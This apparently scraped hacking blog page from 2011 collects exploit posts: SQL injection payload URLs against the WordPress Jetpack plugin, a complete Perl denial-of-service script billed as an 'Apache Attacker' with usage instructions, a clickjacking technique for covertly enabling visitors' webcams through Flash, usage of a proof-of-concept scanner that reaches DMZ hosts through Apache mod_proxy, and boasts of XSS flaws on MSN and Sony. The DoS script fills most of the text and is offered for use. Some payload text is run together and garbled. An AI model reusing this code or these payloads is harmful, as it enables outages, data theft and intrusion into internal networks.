Infographic by Veracode Application Security
Showing posts with label vulnerability. Show all posts
Showing posts with label vulnerability. Show all posts
Infographic by Veracode Application Security
Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
Jetpack is a WordPress plugin that supercharges your self-hosted WordPress site with the awesome cloud power of WordPress.com.A SQL vulnerability have been found by longrifle0x in this plugin.File: wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=ifExploitation:http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None'LIMIT 0,1)='Y') THEN 1 ELSE 0 END)http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][MID((VERSION()),1,6)Via - 1337day
A security vulnerability have been found on Latest version of Apache Server 2.3.14 . This vulnerability was discovered by Egyptian hacker/exploit writer Xen0n . He developed an perl exploit making everyone capable to exploit this vulnerability #!/usr/bin/perl -w
# Exploit Title: Apache Server 2.3.14 <= Denial of Service exploit (DDOS)
# Date: 22/10/2011
# Author: Xen0n
# Software Link: http://www.apache.org/dyn/closer.cgi
# Version: 2.3.14 and older
# Tested on: CentOs
#feel free to contact us xenon.sec@gmail.com
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
ooooooo ooooo .oooo.
`8888 d8' d8P'`Y8b
Y888..8P .ooooo. ooo. .oo. 888 888 ooo. .oo.
`8888' d88' `88b `888P"Y88b 888 888 `888P"Y88b
.8PY888. 888ooo888 888 888 888 888 888 888
d8' `888b 888 .o 888 888 `88b d88' 888 888
o888o o88888o `Y8bod8P' o888o o888o `Y8bd8P' o888o o888o
Welcome to Xen0n Apache Attacker
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $xenon, $method, $ssl, $rand, $tcpto );
my $result = GetOptions('shost=s' => \$shost,'dns=s' => \$host,'xenon' => \$xenon,'num=i' => \$connections,'cache' => \$cache,'port=i' => \$port,'https' => \$ssl,'tcpto=i' => \$tcpto,'test' => \$test,'timeout=i' => \$timeout,'version' => \$version,);
if ($version) {
print "Version 1.0\n";
exit;
}
unless ($host) {
print "Test:\n\n\tperl $0 -dns [www.example.com] -test\n";
print "Usage:\n\n\tperl $0 -dns [www.example.com] -port 80 -timeout 100 -num 1000 -tcpto 5 -xenon\n";
print "\n\temail: xenon.sec@ gmail.com\n";
print "\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Xen0n will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($xenon) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "1", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "Testing $host could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now just wait...\n";
}
else {
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Xen0n closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Xen0n against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
"Attacking $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
"Current stats:\tXen0n has sent $packetcount packets to $host.\nThe attack will sleep for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
# 1337day.com [2011-10-22]
A slight variation of a previously designed clickjacking attack that used a Adobe Flash vulnerability has once again made it possible for website administrators to surreptitiously spy on their visitors by turning on the user's computer webcam and microphone.
It works in all versions of Adobe Flash that the researcher have tested . He’ve confirmed that it works in the Firefox and Safari for Mac browsers. Use one of those if you check out the live demo. There’s a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux).
| Source |
It works in all versions of Adobe Flash that the researcher have tested . He’ve confirmed that it works in the Firefox and Safari for Mac browsers. Use one of those if you check out the live demo. There’s a weird CSS opacity bug in most other browsers (Chrome for Mac and most browsers on Windows/Linux).
Clickjacking + Adobe Flash = Sad Times!
This attack works by using a neat variation of the normal clickjacking technique that spammers and other bad people are using in the wild right now. For the uninitiated:
Combine clickjacking with the Adobe Flash Player Setting Manager pageand you have a recipe for some sad times.
How the attack works ?
Instead of iframing the whole settings page (which contains the framebusting code), Just iframe the settings SWF file. This bypasses the framebusting JavaScript code, since we don’t load the whole page — just the remote .SWF file. I was really surprised to find out that this actually works!
A bunch of clickjacking attacks in the wild, never any attacks where the attacker iframes a SWF file from a remote domain to clickjack it — let alone a .SWF file as important as one that controls access to your webcam and mic!
The problem here is the Flash Player Setting Manager, this inheritance from Macromedia might be the Flash Player security Achilles heel.— Guya.net
This is a screenshot of what the Settings Manager .SWF file looks like:
| Source |
A recent Apache vulnerability has been made public whereby an attacker could gain unauthorised access to content in the DMZ network:
SECFORCE has developed a proof of concept for this vulnerability .The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall. Click here to download the POC.
Usage :-
| Description | |
|---|---|
| The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character. |
SECFORCE has developed a proof of concept for this vulnerability .The script exploits the vulnerability and allows the user to retrieve arbitrary known files from the DMZ. The tool can also be used to perform a port scan of the web server using the Apache proxy functionality, and therefore bypassing any firewall. Click here to download the POC.
Usage :-
rmacros@laptop2: python apache_proxy_scanner.py
CVE-2011-3368 proof of concept by Rodrigo Marcos http://www.secforce.co.uk usage(): python apache_scan.py [options] [options] -r: Remote Apache host -p: Remote Apache port (default is 80) -u: URL on the remote web server (default is /) -d: Host in the DMZ (default is 127.0.0.1) -e: Port in the DMZ (enables 'single port scan') -g: GET request to the host in the DMZ (default is /) -h: Help page examples: - Port scan of the remote host python apache_scan.py -r www.example.com -u /img/test.gif - Port scan of a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local - Retrieve a resource from a host in the DMZ python apache_scan.py -r www.example.com -u /img/test.gif -d internalhost.local -e 80 -g /accounts/index.html
The following screenshot shows the result of the command above:
| source |
TeamDX discovered XSS Vulnerability in MSN.Com. The Vulnerable Link here. XSS is a computer security vulnerability that helps attackers to inject client-side script into web pages viewed by other users.
The C7 crew found new XSS vulnerability on Sony playstation. That means Sony is still not safe. Why cant they spend some bucks to fix all these bugs? Sony was hacked more than 20 times last month and this shows that Sony is still not secure and hackable.
Link to Vulnerable Page.
sony hacked sony vulnerable sony c7 crew
